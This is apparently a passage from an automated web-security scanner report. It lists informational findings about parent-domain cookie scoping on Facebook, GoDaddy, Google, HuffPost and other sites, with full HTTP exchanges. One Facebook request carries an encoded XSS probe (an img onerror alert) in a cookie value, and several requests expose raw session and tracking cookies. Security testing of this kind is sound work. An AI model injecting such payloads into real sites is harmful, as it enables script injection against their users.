Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.105. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • lsd=Mkkns; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.106. https://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.107. https://www.facebook.com/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /r.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.226.129
Connection: close
Date: Thu, 05 May 2011 10:56:58 GMT
Content-Length: 29546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.108. https://www.facebook.com/recover.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /recover.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • made_write_conn=1304595854; path=/; domain=.facebook.com
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
  • W=1304595854; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.109. https://www.godaddy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
  • currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
  • currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
  • traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.110. https://www.godaddy.com/domains/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
  • currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
  • currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
  • traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
  • BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.111. https://www.godaddy.com/gdshop/hosting/landing.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
  • traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

10.112. https://www.godaddy.com/gdshop/registrar/search.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close


10.113. https://www.godaddy.com/gdshop/website.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close


10.114. http://www.google.com/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 05 May 2011 10:57:55 GMT
Expires: Thu, 05 May 2011 10:57:55 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

10.115. http://www.huffingtonpost.com/users/logout/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /users/logout/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /users/logout/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82719
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

10.116. http://www.marketwatch.com/News/Story/Story.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...

10.117. http://www.moviefone.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
  • ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
